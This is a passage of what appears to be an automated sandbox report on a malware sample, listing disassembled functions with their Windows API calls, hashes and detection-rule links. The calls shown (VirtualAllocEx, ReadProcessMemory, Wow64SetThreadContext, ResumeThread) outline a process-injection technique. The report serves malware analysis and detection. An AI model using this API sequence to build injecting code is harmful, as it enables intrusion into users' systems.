                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 027F1F26
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: f4759e078dab5603594ebd522df4504aec166e475177780c8ab04d42b47c2ef0
                                  • Instruction ID: 50abb1b8ed1f54ac079f11e1a64cd7013574cd989c5e529fdda4a28298553ce8
                                  • Opcode Fuzzy Hash: f4759e078dab5603594ebd522df4504aec166e475177780c8ab04d42b47c2ef0
                                  • Instruction Fuzzy Hash: F2218771D043098FDB50DFAAC4857AEBBF4AF88324F54842AD519A7381CB789945CFA0
                                  Function 00C7D678 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 338 c7d678-c7d67e 339 c7d680-c7d714 DuplicateHandle 338->339 340 c7d716-c7d71c 339->340 341 c7d71d-c7d73a 339->341 340->341
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C7D707
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 46f809c17eaa639c59d88849be32f1f3f4748203cf64ea365f499839c7009cbc
                                  • Instruction ID: 18d9eb6eb3ced198935b8b956fcf13b22b3951ebad549102a50134276d37cdc0
                                  • Opcode Fuzzy Hash: 46f809c17eaa639c59d88849be32f1f3f4748203cf64ea365f499839c7009cbc
                                  • Instruction Fuzzy Hash: 7B21E5B5900249AFDB10CF9AD484ADEBBF5EB48310F14841AE918A3350D379A954CF60
                                  Function 027F2130 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 354 27f2130-27f21bd ReadProcessMemory 357 27f21bf-27f21c5 354->357 358 27f21c6-27f21f6 354->358 357->358
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027F21B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 6885fe0d6f45ac33a0a2cd63446587d419462e44c32fc925cf257fb7bcfcff82
                                  • Instruction ID: fd7e5ac0ce52c711a7106145b2fcd2392feb0627375cae901f5f609a642ba2ef
                                  • Opcode Fuzzy Hash: 6885fe0d6f45ac33a0a2cd63446587d419462e44c32fc925cf257fb7bcfcff82
                                  • Instruction Fuzzy Hash: 512125718003499FDB10DFAAC881BEEFBF5FF88310F50842AE919A7240C7799944CBA4
                                  Function 027F1EA8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 344 27f1ea8-27f1ef3 346 27f1ef5-27f1f01 344->346 347 27f1f03-27f1f33 Wow64SetThreadContext 344->347 346->347 349 27f1f3c-27f1f6c 347->349 350 27f1f35-27f1f3b 347->350 350->349
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 027F1F26
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: af754e8063b9ce467e075d9ce2436fa8b07f3ab838bb16d8ac6e3cbdeea99dd3
                                  • Instruction ID: 7fc3bb2e6349d222dba9e439d0da847fc80d31b7b2acd3abb0c3abbf9cfac3d3
                                  • Opcode Fuzzy Hash: af754e8063b9ce467e075d9ce2436fa8b07f3ab838bb16d8ac6e3cbdeea99dd3
                                  • Instruction Fuzzy Hash: 132135719043098FDB10DFAAC4857AEBBF4AF88324F54842AD519A7380CB789944CFA0
                                  Function 00C7D680 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C7D707
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 4d31c79aee914522bea8524cbf8a1563fa6c18b424d951d16c257b36f0f495d4
                                  • Instruction ID: b6ba0f4056d4d67abdf9094b9439cb1d2e551a8a4bc6ff95f35b95cbb73cb565
                                  • Opcode Fuzzy Hash: 4d31c79aee914522bea8524cbf8a1563fa6c18b424d951d16c257b36f0f495d4
                                  • Instruction Fuzzy Hash: 2021C4B59002499FDB10CFAAD884ADEFBF9FB48310F14841AE919A3350D375A954CFA5
                                  Function 027F19B8 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 47207a8d6557fcb4d2d53a88d693c73c2b74e0026293c8c7780cfc408ea76c9f
                                  • Instruction ID: c6dddf95b427d6bfcfe831854dad105b6c4194bc231c49e03c04259a955f9282
                                  • Opcode Fuzzy Hash: 47207a8d6557fcb4d2d53a88d693c73c2b74e0026293c8c7780cfc408ea76c9f
                                  • Instruction Fuzzy Hash: 8511CAB1C083898FCB20CFAAC8447EEFBF5AF98210F14845AC559A3340CB355901CFA4
                                  Function 00C7A168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C7B079,00000800,00000000,00000000), ref: 00C7B28A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 481eccb41a77f8bbc0b723775e281ef989f74142abc41f8ae8acf51958cc78db
                                  • Instruction ID: 78bc25fa7567685548cc04c08cc36c41fa7733c746139d124aa4f50f262ba988
                                  • Opcode Fuzzy Hash: 481eccb41a77f8bbc0b723775e281ef989f74142abc41f8ae8acf51958cc78db
                                  • Instruction Fuzzy Hash: 911126B68003099FDB20CF9AC444BDEFBF4EB88710F14842ED519A7241C375A945CFA4
                                  Function 027F1F78 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 027F1FEE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 37bfb9836428faf7895abd0f849cb169a94444b8316978268216fae4eea00f8d
                                  • Instruction ID: 4b0ee1059c8c8692d92d31502d7a36525cffedd37fb878a761048c5f8f2d69e2
                                  • Opcode Fuzzy Hash: 37bfb9836428faf7895abd0f849cb169a94444b8316978268216fae4eea00f8d
                                  • Instruction Fuzzy Hash: C51159718002499FDF20DFAAC845BEEBBF5AF88324F148419E559A7250C7759500CFA0
                                  Function 00C7B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C7B079,00000800,00000000,00000000), ref: 00C7B28A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: d5b6e386ebfacf0f9e25ea909ad0f8410a281113ce0698470ff62399226ccd26
                                  • Instruction ID: 0d8818f81625473454755fa65b112aa4cd744426fab06938d25d33c183b10bac
                                  • Opcode Fuzzy Hash: d5b6e386ebfacf0f9e25ea909ad0f8410a281113ce0698470ff62399226ccd26
                                  • Instruction Fuzzy Hash: C21114B68003498FDB10DFAAC444BDEFBF4EB88710F14842ED969A7240C375A945CFA5
                                  Function 027F1F80 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 027F1FEE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f1c74af4c1ef496c4cb09d53267d36ef7c54d64548ab538b8bcff0a7f3d42369
                                  • Instruction ID: a4e031916a1e3eaa31e97daf0a2fd6cccce5bd068bfb70bb12ab51bd72a868fb
                                  • Opcode Fuzzy Hash: f1c74af4c1ef496c4cb09d53267d36ef7c54d64548ab538b8bcff0a7f3d42369
                                  • Instruction Fuzzy Hash: 4B1126719003499FDB20DFAAC845BDEBBF5AF88324F148419E919A7250C7759550CFA0
                                  Function 027F19C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 7a520d552f1c5f314fe7ea8b3e9cfaa4f75b1ce17f3cf3a07f0e43bba4b645dc
                                  • Instruction ID: b4a2be7e987832b12a7ebae09a3e5bc4a09c11c6feef3046de4b0c04d895fd8a
                                  • Opcode Fuzzy Hash: 7a520d552f1c5f314fe7ea8b3e9cfaa4f75b1ce17f3cf3a07f0e43bba4b645dc
                                  • Instruction Fuzzy Hash: D71125719003498FDB20DFAAC44579EFBF9AB88624F248419D519A7240CB79A944CFA4
                                  Function 027F74A3 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 027F7500
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 68ce64ab1404effb3445070add2ce673d7d5b317849f21729d83e611f508dd1f
                                  • Instruction ID: 9db1dcfb1917b96df6b41c43c955990eb6a831e52153595ac597ca23d58735a0
                                  • Opcode Fuzzy Hash: 68ce64ab1404effb3445070add2ce673d7d5b317849f21729d83e611f508dd1f
                                  • Instruction Fuzzy Hash: 6D1113B58002498FCB20DFAAC485BEEFFF4EB48320F24845AD599A7241C779A545CFA4
                                  Function 00C7AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00C7AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499507575.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c70000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 30cb3db88dc3fa24f935c270a6f502cd9083335ced40f0b401ba5afcd2313a29
                                  • Instruction ID: 8131e2265a06e5422e7deda75256fb9bfc7ca67bbd7358c1fef1162890bb6468
                                  • Opcode Fuzzy Hash: 30cb3db88dc3fa24f935c270a6f502cd9083335ced40f0b401ba5afcd2313a29
                                  • Instruction Fuzzy Hash: 7911E0B5C003498FDB24DF9AC444BDEFBF4AB88324F14841AD429A7650D379AA45CFA1
                                  Function 027F0864 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 027F4695
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 301d1688bbf5695c3cc1bb502e5fe2a7d001a0327732ec2bd40311d0ca43d2c6
                                  • Instruction ID: 6b44a8a8bca340b5281f4c015367e88f93b5509966ec5d06d6d4816f8d752874
                                  • Opcode Fuzzy Hash: 301d1688bbf5695c3cc1bb502e5fe2a7d001a0327732ec2bd40311d0ca43d2c6
                                  • Instruction Fuzzy Hash: 6711F5B58043499FDB20DF9AC845BDFBBF8EB48310F108459E618A7740C375A944CFA5
                                  Function 027F4630 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 027F4695
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 71f56f8fa089ebaba3e70d5d3b63712af953fce80e1b5a7d6dc0a8dbeb2729aa
                                  • Instruction ID: c1c2e7bb4155b7d7468d454d579cd675da1bcde6b73a8a3d6d1a2bbdff2c4e24
                                  • Opcode Fuzzy Hash: 71f56f8fa089ebaba3e70d5d3b63712af953fce80e1b5a7d6dc0a8dbeb2729aa
                                  • Instruction Fuzzy Hash: 3F11F5B58042499FDB20DF9AC985BEEBFF4EB48310F20845AD658A7640C375A944CFA0
                                  Function 027F74A8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 027F7500
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 6bcd7b6db28f2de128f78f20f3d4eadd17b0be5db25858de6aacbfe529eb46eb
                                  • Instruction ID: 2ecd2d0efc06fcc7215c7f43376d5fc0db9dd3e20112a9137127482d345c8541
                                  • Opcode Fuzzy Hash: 6bcd7b6db28f2de128f78f20f3d4eadd17b0be5db25858de6aacbfe529eb46eb
                                  • Instruction Fuzzy Hash: AF1115B58003498FDB20DF9AC445BDEFBF4EB48320F14841AD559A7340D779A644CFA5
                                  Function 00BFD3D8 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499351981.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3bab71edd8190982b527aaf45cd910c1ab65cccc4c19dc6942e1c716e4849bd8
                                  • Instruction ID: 15f40df49ce0bf15e6ea5ec5b627a907def02555223b6393f6cefceb15ccec32
                                  • Opcode Fuzzy Hash: 3bab71edd8190982b527aaf45cd910c1ab65cccc4c19dc6942e1c716e4849bd8
                                  • Instruction Fuzzy Hash: 66212875604308DFDB04DF14D9C4B26BBA6FB94324F20C5A9DA090B356C336E85ACBA2
                                  Function 00BFD4C4 Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499351981.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5181072dbd5456b3c0e73a871175566be21d6e197349e89a2058faaa2f3a835a
                                  • Instruction ID: 19708f7ec00277132e62996cf64c90434f11b6be8c19f0f992e2d9e5da69854b
                                  • Opcode Fuzzy Hash: 5181072dbd5456b3c0e73a871175566be21d6e197349e89a2058faaa2f3a835a
                                  • Instruction Fuzzy Hash: AF210671504248DFDB05DF14D9C0B26BFA6FB94318F20C5A9DA050B256C336D85ADBA2
                                  Function 00C0D1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499389810.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c801b253d8b2b795f73209cf6ebbdbaa4816b36d4daa6bc18477492ca1279860
                                  • Instruction ID: 2b1e872f343a6272c97833356160210df15b1762bf83d79333f185bd8d4dd04d
                                  • Opcode Fuzzy Hash: c801b253d8b2b795f73209cf6ebbdbaa4816b36d4daa6bc18477492ca1279860
                                  • Instruction Fuzzy Hash: E821F275604304EFDB05DF94D9C4B26BBA5FB84314F20C6ADE84A4B296C336DC46CA61
                                  Function 00C0D01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499389810.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 66c5fad32f149d1e7916a3e6907968ec4317d5da68aafc6a56f2798152f589d7
                                  • Instruction ID: 459bb51abebc5e9ae79ff152a84273e281355f7d61c4d1a90bea175fb0f8763e
                                  • Opcode Fuzzy Hash: 66c5fad32f149d1e7916a3e6907968ec4317d5da68aafc6a56f2798152f589d7
                                  • Instruction Fuzzy Hash: 3021D075604304DFDB14DF54D984B16BB65FB84328F20C569E84E4B286C33AD847CA62
                                  Function 00C0D005 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499389810.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec43e582e2a838ddd4ebba2f59bbc2956a70cf6ed7038db7825faf10dc2a1015
                                  • Instruction ID: 044fa74b1a560b2be5734f1f663ad22ea91efec1d82956d0b0d6847620b5424c
                                  • Opcode Fuzzy Hash: ec43e582e2a838ddd4ebba2f59bbc2956a70cf6ed7038db7825faf10dc2a1015
                                  • Instruction Fuzzy Hash: 852162755093C08FCB12CF64D994715BF71EB46314F28C5EAD8498F6A7C33A990ACB62
                                  Function 00BFD4BF Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499351981.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                  • Instruction ID: 1a50020284933ac92dacdf050c4eb5225733c46cce87d4cedad7e262bc2f050e
                                  • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                  • Instruction Fuzzy Hash: 4111D376504284CFCB15CF14D5C4B26BFB2FB94324F24C6A9D9490B656C33AD85ACBA2
                                  Function 00BFD3D3 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499351981.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                  • Instruction ID: e133d19b1f167ba9a16e00a58b5641d49274cb6ed8941cdfa2f2c552873c6830
                                  • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                  • Instruction Fuzzy Hash: 69110376504244CFCB01CF00D5C0B26BFB2FB94324F24C2A9D9090B756C33AE85ACBA2
                                  Function 00C0D1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499389810.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c0d000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                  • Instruction ID: 2dfb435082e6ed9b11b8dd0eccd3d4132f512bcd734d69ca700e22f9813efd5c
                                  • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                  • Instruction Fuzzy Hash: 0D11DD75504280DFCB01CF54C5C0B15FBB2FB84324F24C6ADD84A4B696C33AD94ACB61
                                  Function 00BFD759 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499351981.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3bfe9dc6ff8a0924de68ad8bed26cbd986a3bd4f16969a33d4f69df6cbb5a5ce
                                  • Instruction ID: f9e9910228f5e9726bc831f7b73541201592cb2056a9d4484fa0e3501061ab59
                                  • Opcode Fuzzy Hash: 3bfe9dc6ff8a0924de68ad8bed26cbd986a3bd4f16969a33d4f69df6cbb5a5ce
                                  • Instruction Fuzzy Hash: A001A7711043489AE7206B15CCC4B76FBD9EF45725F28C59AEE094F286C7799C44CB72
                                  Function 00BFD758 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499351981.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bfd000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c377828320212995fadf5366a7ff693d0cefec33384ded7b41fef59ecc1da74b
                                  • Instruction ID: f0b4329b889c8ea1db786d0a02554b315cf55931a54ee7ec54d6b1cd7281872b
                                  • Opcode Fuzzy Hash: c377828320212995fadf5366a7ff693d0cefec33384ded7b41fef59ecc1da74b
                                  • Instruction Fuzzy Hash: 18F06271404348AEEB209B16DC84B62FFE8EF55735F18C59AED084F296C279AC44CBB1

                                  Non-executed Functions

                                  Function 027F5AB0 Relevance: .3, Instructions: 345COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebfc41d1ca61ca2b719c73cb58c62537b82073d718804d56e8db60b2ca19a61b
                                  • Instruction ID: 0466197f712b74e34bfbee2ac0772154f2b1d29393063642be1fad2aa0e98423
                                  • Opcode Fuzzy Hash: ebfc41d1ca61ca2b719c73cb58c62537b82073d718804d56e8db60b2ca19a61b
                                  • Instruction Fuzzy Hash: EEC1C8317056008FDB69DB75C464B6E77EAAFC9705F94846DD20ADB3A1CB34E802CB52
                                  Function 027F1A70 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 659296ee7f77c5f54b4f25453ef18ced3fd61a8773fd38a3a16f731f60a2c25d
                                  • Instruction ID: 867490a6374272c2336fc6c0284a799d840b81876ec4af5313993f6dc1b54e82
                                  • Opcode Fuzzy Hash: 659296ee7f77c5f54b4f25453ef18ced3fd61a8773fd38a3a16f731f60a2c25d
                                  • Instruction Fuzzy Hash: 93E10874E04219CFDB14DFA9C580AAEFBB2FF89305F248169D518AB356D730A942CF61
                                  Function 027F1198 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4eb40adcefa72340001b73e8a17a9523e2279fa145c90fbf78add86c2afdf60c
                                  • Instruction ID: 49a047ba083ad8aa1f209f6319219fa38702a0b1dea399e2d722f97df8a9330c
                                  • Opcode Fuzzy Hash: 4eb40adcefa72340001b73e8a17a9523e2279fa145c90fbf78add86c2afdf60c
                                  • Instruction Fuzzy Hash: 87E10774E04219CFDB14DFA9C580AAEBBF2FF89305F248169D518AB356D730A942CF61
                                  Function 027F6B50 Relevance: .3, Instructions: 298COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1499959692.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_27f0000_CMV610942X6UI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
